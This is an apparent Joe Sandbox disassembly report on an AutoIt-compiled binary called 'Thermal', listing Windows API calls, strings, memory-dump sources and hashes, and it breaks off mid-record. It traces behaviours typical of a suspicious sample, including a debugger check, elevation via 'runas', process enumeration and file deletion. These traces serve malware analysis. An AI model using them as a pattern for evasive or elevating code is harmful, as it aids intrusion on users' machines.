                                                • IsDebuggerPresent.KERNEL32 ref: 0078527E
                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 007852E6
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                  • Part of subcall function 0077BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0077BC07
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00785366
                                                • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 007C0B2E
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0B66
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00826D10), ref: 007C0BE9
                                                • ShellExecuteW.SHELL32(00000000), ref: 007C0BF0
                                                  • Part of subcall function 0078514C: GetSysColorBrush.USER32(0000000F), ref: 00785156
                                                  • Part of subcall function 0078514C: LoadCursorW.USER32(00000000,00007F00), ref: 00785165
                                                  • Part of subcall function 0078514C: LoadIconW.USER32(00000063), ref: 0078517C
                                                  • Part of subcall function 0078514C: LoadIconW.USER32(000000A4), ref: 0078518E
                                                  • Part of subcall function 0078514C: LoadIconW.USER32(000000A2), ref: 007851A0
                                                  • Part of subcall function 0078514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007851C6
                                                  • Part of subcall function 0078514C: RegisterClassExW.USER32(?), ref: 0078521C
                                                  • Part of subcall function 007850DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00785109
                                                  • Part of subcall function 007850DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0078512A
                                                  • Part of subcall function 007850DB: ShowWindow.USER32(00000000), ref: 0078513E
                                                  • Part of subcall function 007850DB: ShowWindow.USER32(00000000), ref: 00785147
                                                  • Part of subcall function 007859D3: _memset.LIBCMT ref: 007859F9
                                                  • Part of subcall function 007859D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00785A9E
                                                Strings
                                                • AutoIt, xrefs: 007C0B23
                                                • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 007C0B28
                                                • runas, xrefs: 007C0BE4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                • API String ID: 529118366-2030392706
                                                • Opcode ID: cdd246e6cf89bad888368dafd6ff7092a9e2069d9e82018a09ea6906dbe16e9e
                                                • Instruction ID: 61dd8488185bbfc0ae55466bd263fc3d1c5def3d208957b4d1b7e0918c93dba9
                                                • Opcode Fuzzy Hash: cdd246e6cf89bad888368dafd6ff7092a9e2069d9e82018a09ea6906dbe16e9e
                                                • Instruction Fuzzy Hash: 6F514A7098424CEACF21FBB4DC0AEEE7B79FF45340F1040A9F452A2262CA7C9945CB61
                                                APIs
                                                  • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                  • Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D3D96
                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007D3E3E
                                                • MoveFileW.KERNEL32(?,?), ref: 007D3E51
                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007D3E6E
                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007D3E90
                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007D3EAC
                                                Similarity
                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 4002782344-1173974218
                                                • Opcode ID: 083762c4b07bdf724bcb0fe4c63a9156a256e91b806b4be42fe9ddaeea2841ec
                                                • Instruction ID: b000644190952bd17356e2caa7984847fff811a5fc2eb415d45e646bded8a1e7
                                                • Opcode Fuzzy Hash: 083762c4b07bdf724bcb0fe4c63a9156a256e91b806b4be42fe9ddaeea2841ec
                                                • Instruction Fuzzy Hash: 5A51843184114DEACF15FBA0D99A9EDB779AF10301F644166E441B3291DF396F0ACB61
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00785D40
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • GetCurrentProcess.KERNEL32(?,00800A18,00000000,00000000,?), ref: 00785E07
                                                • IsWow64Process.KERNEL32(00000000), ref: 00785E0E
                                                • GetNativeSystemInfo.KERNEL32(00000000), ref: 00785E54
                                                • FreeLibrary.KERNEL32(00000000), ref: 00785E5F
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00785E90
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00785E9C
                                                Similarity
                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                • String ID:
                                                • API String ID: 1986165174-0
                                                • Opcode ID: fe7c8f82708239f7d55e067a4af9d689c6da5131752bc0c1ae25b99226b64b18
                                                • Instruction ID: 147d5a72fddc3018f3d158741b0eb6658741c73d72dc6ad6381e26a54988cb51
                                                • Opcode Fuzzy Hash: fe7c8f82708239f7d55e067a4af9d689c6da5131752bc0c1ae25b99226b64b18
                                                • Instruction Fuzzy Hash: E791B631589BC4DEC731DB7884505ABFFE5BF2A300F884A9ED0C797A42D238A548D769
                                                APIs
                                                  • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                  • Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D407C
                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 007D40CC
                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007D40DD
                                                • FindClose.KERNEL32(00000000), ref: 007D40F4
                                                • FindClose.KERNEL32(00000000), ref: 007D40FD
                                                Similarity
                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 2649000838-1173974218
                                                • Opcode ID: 24a0888bffd925f00c622be168cfa2b49c9acf2489493fc55e0af21138ae06a1
                                                • Instruction ID: 76ed7656cd91326057f129d55bd1a7478e51231739a255cfb2830c6853eb18b9
                                                • Opcode Fuzzy Hash: 24a0888bffd925f00c622be168cfa2b49c9acf2489493fc55e0af21138ae06a1
                                                • Instruction Fuzzy Hash: 33316331048385DFC701FB60D8999AFB7ECBE95304F444A5EF5E582291DB39D909CBA2
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 007D416D
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 007D417B
                                                • Process32NextW.KERNEL32(00000000,?), ref: 007D419B
                                                • CloseHandle.KERNEL32(00000000), ref: 007D4245
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 395f1cc134522c221ec82394438973afef38d1a42c875bbffd49cbdab372cff3
                                                • Instruction ID: c57331a14f5e08afee9f31eba3314cd102b996f49715970149f9a8743eddf177
                                                • Opcode Fuzzy Hash: 395f1cc134522c221ec82394438973afef38d1a42c875bbffd49cbdab372cff3
                                                • Instruction Fuzzy Hash: 64314D71148341DBD304EF50E889AAEBBF8BF95350F40052EF585822A1EB75AA49CB92
                                                APIs
                                                  • Part of subcall function 00783740: CharUpperBuffW.USER32(?,008371DC,00000000,?,00000000,008371DC,?,007753A5,?,?,?,?), ref: 0078375D
                                                • _memmove.LIBCMT ref: 0077B68A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper_memmove
                                                • String ID:
                                                • API String ID: 2819905725-0
                                                • Opcode ID: e871c021c1db2d57b9cdf9cd3e1fcf57b50046189ac7a71ed2deee7d67f71447
                                                • Instruction ID: b02512a2b423c2efd75704f40639f36570d0554f1009476dffd5d349046a49c2
                                                • Opcode Fuzzy Hash: e871c021c1db2d57b9cdf9cd3e1fcf57b50046189ac7a71ed2deee7d67f71447
                                                • Instruction Fuzzy Hash: 82A26870608741DFDB20DF28C484B6AB7E1BF88344F14895DE89A8B361D779ED85CB92
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,007BFC86), ref: 007D495A
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D496B
                                                • FindClose.KERNEL32(00000000), ref: 007D497B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 846fab9835418e094a279fe3e001c162fbb901723817b9cf2f134498568695fc
                                                • Instruction ID: 134cdb7df7a19620caa099a50b949946d33bd7e1f8b84dad8fb6a7cf48c022e7
                                                • Opcode Fuzzy Hash: 846fab9835418e094a279fe3e001c162fbb901723817b9cf2f134498568695fc
                                                • Instruction Fuzzy Hash: 5CE0DF31810505ABC3206738EC0D9EA776CAF06339F200706F835C22E0EB74A9448AD6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba3eeb76c46059dc31c3934b2b72bdf87b7043a4532cfb6cce1dce4882c2e598
                                                • Instruction ID: beeb02582df3799879c8bd63bbfc23c09a4c139c70e21ae3d878d0999391f899
                                                • Opcode Fuzzy Hash: ba3eeb76c46059dc31c3934b2b72bdf87b7043a4532cfb6cce1dce4882c2e598
                                                • Instruction Fuzzy Hash: 5522BF70A0121ADFDF14DF58C484BAEB7B0FF45340F14C569EA5AAB351E378A981CB91
                                                APIs
                                                • timeGetTime.WINMM ref: 0077BF57
                                                  • Part of subcall function 007752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
                                                • Sleep.KERNEL32(0000000A,?,?), ref: 007B36B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePeekSleepTimetime
                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                • API String ID: 1792118007-922114024
                                                • Opcode ID: 44b65cc0518dcf7b295acb2fd74f429233c9be5aefc0e83f6ab6970340330fa7
                                                • Instruction ID: fa225c4f259c7101c51d0130f10d0122292357c0f18c6eb6effd553b5b9d87ce
                                                • Opcode Fuzzy Hash: 44b65cc0518dcf7b295acb2fd74f429233c9be5aefc0e83f6ab6970340330fa7
                                                • Instruction Fuzzy Hash: 10C2D470608341DFDB24DF24C848BAAB7E5FF84344F14891DF58A972A1DB79E984CB92
                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773444
                                                • RegisterClassExW.USER32(00000030), ref: 0077346E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
                                                • InitCommonControlsEx.COMCTL32(?), ref: 0077349C
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
                                                • LoadIconW.USER32(000000A9), ref: 007734C2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: e5764a627c1f279ec7bb6902646a3a1e8c6367667cf93375295197c6f62aa451
                                                • Instruction ID: dee2a5e093b451685737f166ca2b4923e7535ac82242a2d80646c2d71a18ccb2
                                                • Opcode Fuzzy Hash: e5764a627c1f279ec7bb6902646a3a1e8c6367667cf93375295197c6f62aa451
                                                • Instruction Fuzzy Hash: 0C314AB1904309AFDB508FA4DC89BDDBBF0FF08310F10452AE555E62A0D7BA5645CF90
                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773444
                                                • RegisterClassExW.USER32(00000030), ref: 0077346E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
                                                • InitCommonControlsEx.COMCTL32(?), ref: 0077349C
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
                                                • LoadIconW.USER32(000000A9), ref: 007734C2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 7728f520895cec6dd0bdd7e1894f1f73dd7d363f03aa0e0c6b97f9351a53055a
                                                • Instruction ID: ab4f0fb1768940948c0034b6251d5e6ea1184a2a39cf6659d66a9f3f7e5671c8
                                                • Opcode Fuzzy Hash: 7728f520895cec6dd0bdd7e1894f1f73dd7d363f03aa0e0c6b97f9351a53055a
                                                • Instruction Fuzzy Hash: 1A21E3B1904218AFEB509FA4EC89B9EBBF4FB08710F00852AFA15A62A0D7B55544CF95
                                                APIs
                                                  • Part of subcall function 007900CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00783094), ref: 007900ED
                                                  • Part of subcall function 007908C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0078309F), ref: 007908E3
                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007830E2
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007C01BA
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007C01FB
                                                • RegCloseKey.ADVAPI32(?), ref: 007C0239
                                                • _wcscat.LIBCMT ref: 007C0292
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 2673923337-2727554177
                                                • Opcode ID: ed7526c09de574574a32bdf83cf8fa1e61b76294430f6b5a8f75f359457aa6ff
                                                • Instruction ID: bcd553c35fc3d4eeb5ab8c97ca1affd2f47b0c41161cc39fe965bf5e1edaf449
                                                • Opcode Fuzzy Hash: ed7526c09de574574a32bdf83cf8fa1e61b76294430f6b5a8f75f359457aa6ff
                                                • Instruction Fuzzy Hash: E2715871549701DEC704EF69EC899ABBBA8FF84340F80092EF555C32A1EF749949CB92
                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00785156
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00785165
                                                • LoadIconW.USER32(00000063), ref: 0078517C
                                                • LoadIconW.USER32(000000A4), ref: 0078518E
                                                • LoadIconW.USER32(000000A2), ref: 007851A0
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007851C6
                                                • RegisterClassExW.USER32(?), ref: 0078521C
                                                  • Part of subcall function 00773411: GetSysColorBrush.USER32(0000000F), ref: 00773444
                                                  • Part of subcall function 00773411: RegisterClassExW.USER32(00000030), ref: 0077346E
                                                  • Part of subcall function 00773411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
                                                  • Part of subcall function 00773411: InitCommonControlsEx.COMCTL32(?), ref: 0077349C
                                                  • Part of subcall function 00773411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
                                                  • Part of subcall function 00773411: LoadIconW.USER32(000000A9), ref: 007734C2
                                                  • Part of subcall function 00773411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: cb9491bfd742b7d29c9ee27cc98ff2744ddaefacae37ab2a1009764de54ec54f
                                                • Instruction ID: 6542512517b1c09f7dad82d2d3a08dc4a9ae5e0a7dd65432fd194eb1516d6cab
                                                • Opcode Fuzzy Hash: cb9491bfd742b7d29c9ee27cc98ff2744ddaefacae37ab2a1009764de54ec54f
                                                • Instruction Fuzzy Hash: BA216DB1D04309AFEB209FA4ED09B9E7BF5FB48310F004519F505A62A1C7B69540DF84
                                                APIs
                                                • WSAStartup.WS2_32(00000101,?), ref: 007E5E7E
                                                • inet_addr.WSOCK32(?,?,?), ref: 007E5EC3
                                                • gethostbyname.WS2_32(?), ref: 007E5ECF
                                                • IcmpCreateFile.IPHLPAPI ref: 007E5EDD
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5F4D
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5F63
                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007E5FD8
                                                • WSACleanup.WSOCK32 ref: 007E5FDE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: cbcdb95d23b8e2030e76acd7c13986fa9f948985117806bc1f647ec0a39dfad5
                                                • Instruction ID: 0b591ba1ef54b7854c2b7b56e5b19ff44d63edccd79093440a231f98ead9ddce
                                                • Opcode Fuzzy Hash: cbcdb95d23b8e2030e76acd7c13986fa9f948985117806bc1f647ec0a39dfad5
                                                • Instruction Fuzzy Hash: 2A518A31605745DFDB20EF25CC49B2AB7E4AF48724F148929F999DB2A1DB78E900CB42
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00784E22
                                                • KillTimer.USER32(?,00000001), ref: 00784E4C
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00784E6F
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00784E7A
                                                • CreatePopupMenu.USER32 ref: 00784E8E
                                                • PostQuitMessage.USER32(00000000), ref: 00784EAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: fb5e8ee0eaa864c5b6ce3c5fcb2a689b7832a230a9499c51ab6f9f6a23233555
                                                • Instruction ID: 9faa0501a0faab4aac7cb655baa855d0c6ddaccaae8d3b1a61ece8b0900ffb28
                                                • Opcode Fuzzy Hash: fb5e8ee0eaa864c5b6ce3c5fcb2a689b7832a230a9499c51ab6f9f6a23233555
                                                • Instruction Fuzzy Hash: 8241D7B128420BEBEB757F64DC4DB7A3695F785301F000529F502D12A1CABDDC50D7A5
                                                APIs
                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007C0C5B
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • _memset.LIBCMT ref: 00785787
                                                • _wcscpy.LIBCMT ref: 007857DB
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007857EB
                                                • __swprintf.LIBCMT ref: 007C0CD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                • String ID: Line %d: $AutoIt -
                                                • API String ID: 230667853-4094128768
                                                • Opcode ID: f80ed61e25e24294345b844a23acc874c353e5b8ebf254739afdfcf3e26d2027
